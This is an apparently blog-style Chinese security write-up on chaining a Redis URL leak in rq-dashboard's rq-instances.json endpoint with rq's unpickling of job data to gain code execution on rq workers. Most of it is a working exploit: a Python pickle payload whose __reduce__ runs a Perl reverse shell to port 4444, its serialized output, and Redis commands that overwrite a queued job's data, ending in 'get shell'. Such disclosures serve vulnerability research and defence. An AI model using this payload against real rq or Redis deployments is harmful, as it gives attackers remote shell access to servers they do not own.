rq-dashboard信息泄漏导致workerRCE

查看rq-dashboard源码的时候发现有个rq-instances.json接口，直接返回了REDIS_URL

rq-instances.json泄漏redis url

rq-dashboard 在#issue128 merge了两个接口，rq-instances，rq-instances.json，用于支持多个redis-url切换

https://github.com/GerardSoleCa/rq-dashboard/commit/dfac908b47bdd6ba6a507036c46666af9af09329

@blueprint.route('/rq-instance/<instance_number>', methods=['POST'])
@jsonify
def change_rq_instance(instance_number):
    redis_url = current_app.config.get('REDIS_URL')
    if not isinstance(redis_url, list):
        return dict(status='Single RQ. Not Permitted.')
    if int(instance_number) >= len(redis_url):
        raise LookupError('Index exceeds RQ list. Not Permitted.')
    pop_connection()
    current_app.redis_conn = from_url(redis_url[int(instance_number)])
    push_rq_connection()
    return dict(status='OK')


@blueprint.route('/rq-instances.json')
@jsonify
def list_instances():
    return dict(rq_instances=current_app.config.get('REDIS_URL'))

其中current_app.config.get(‘REDIS_URL’)保存reids连接地址

配合rq 的反序列化，可以实现rq worker的rce

rq worker反序列化利用

rq 与redis之间使用cPickle/pickle 进行交互

def unpickle(pickled_string):
    """Unpickles a string, but raises a unified UnpickleError in case anything
    fails.
    This is a helper method to not have to deal with the fact that `loads()`
    potentially raises many types of exceptions (e.g. AttributeError,
    IndexError, TypeError, KeyError, etc.)
    """
    try:
        obj = loads(pickled_string)
    except Exception as e:
        raise UnpickleError('Could not unpickle', pickled_string, e)
    return obj

Job class 的data会被直接unpickle

def _unpickle_data(self):
    self._func_name, self._instance, self._args, self._kwargs = unpickle(self.data)

对应在redis job data 字段

# jobs.py
def add(a,b):
    return a+b

from redis import Redis,from_url
from rq import Queue

import cPickle
import os
import redis

from jobs import add

class exp(object):
    def __reduce__(self):
        s = """perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'"""
        return (os.system, (s,))

e = exp()
s = cPickle.dumps(e)

# r = redis.Redis(host='xxx.xxx.xxx.xxx', port=6379, db=0)
# r.set("e6c36e69a9cf9543243d7921aa1a3d8093b49441", s)

redis_conn=from_url('redis://localhost:6379/1')
q = Queue(connection=redis_conn)

job=q.enqueue(add,a=2,b=2)

s

'cposix\nsystem\np1\n(S\'perl -e \\\'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\\\'\'\np2\ntRp3\n.'

r=redis_conn
hashVal=r.hget('rq:job:24c71cf9-0a8f-442b-a58b-49c4ca93b775','data')

r.hset('rq:job:24c71cf9-0a8f-442b-a58b-49c4ca93b775','data',s)

get shell

参考

1. https://github.com/bit4woo/python_sec
2. https://pyzh.readthedocs.io/en/latest/python-magic-methods-guide.html
3. https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html